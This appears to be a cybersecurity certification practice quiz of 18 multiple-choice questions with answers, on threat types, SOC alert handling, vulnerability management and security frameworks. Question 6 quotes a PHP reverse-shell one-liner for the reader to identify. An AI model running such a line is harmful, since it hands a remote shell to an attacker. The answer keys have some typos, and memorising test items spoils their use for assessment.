Pg11

Question 1

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat

Answer 1

Unintentional insider threat

Question 2

A security analyst has received an incident case regarding malware spreading out of control on a customer’s network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?

A. Cross-reference the signature with open-source threat intelligence.
B. Configure the EDR to perform a full scan.
C. Transfer the malware to a sandbox environment.
D. Log in to the affected systems and run netstat.

Answer 2

Cross-reference the signature with open-source threat intelligence.

Question 3

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts
B. A threat actor has a foothold on the network and is sending out control beacons
C. An administrator executed a new database replication process without notifying the SOC
D. An insider threat actor is running Responder on the local segment, creating traffic replication

Answer 3

An administrator executed a new database replication process without notifying the SOC

Question 4

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report

Answer 4

Risk register

Question 5

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value

Answer 5

Threshold value

Question 6

While reviewing web server logs, a security analyst discovers the following suspicious line:

php -r ’$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”);’

Which of the following is being attempted?

A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell

Answer 6

Reverse shell

Question 7

Which of the following should be updated after a lessons-learned review?

A. Disaster recovery plan
B. Business continuity plan
C. Tabletop exercise
D. Incident response plan

Answer 7

Incident response plan

Question 8

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

A. Perform static analyses using an integrated development environment
B. Deploy compensating controls into the environment
C. Implement server-side logging and automatic updates
D. Conduct regular code reviews using OWASP best practices

Answer 8

Conduct regular code reviews using OWASP best practices

Question 9

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst’s investigation?

A. OpenVAS
B. Angry IP Scanner
C. Wireshark
D. Maltego

Answer 9

Wireshark

Question 10

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization’s endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor’s actions?

A. Delivery
B. Reconnaissance
C. Exploitation
D. Weaponization

Answer 10

Weopanisation

Question 11

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001

Answer 11

CIS Benchmarks

Question 12

Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.)

A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems administration

Answer 12

Executive management

System Administrators.

Question 13

Topic 1
Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage
B. Schedule a task to disable alerting when vulnerability scans are executing
C. Filter all alarms in the SIEM with low seventy
D. Add a SOAR rule to drop irrelevant and duplicated notifications

Answer 13

Add a SOAR rule to drop irrelevant and duplicated notifications

Question 14

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.

Answer 14

A rollback had been executed on the instance.

Question 15

During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be used for further analysis?

A. Fuzzing
B. Static analysis
C. Sandboxing
D. Packet capture

Answer 15

Sandboxing

Question 16

A leader on the vulnerability management team is trying to reduce the team’s workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first?

A. Assigning a custom recommendation for each finding
B. Analyzing false positives
C. Rendering an additional executive report
D. Regularly checking agent communication with the central console

Answer 16

Regularly checking agent communication with the central console

Question 17

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL

Answer 17

ISO 27001

Question 18

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

A. Enabling a user account lockout after a limited number of failed attempts
B. Installing a third-party remote access tool and disabling RDP on all devices
C. Implementing a firewall block for the remote system’s IP address
D. Increasing the verbosity of log-on event auditing on all devices

Answer 18

Enabling a user account lockout after a limited number of failed attempts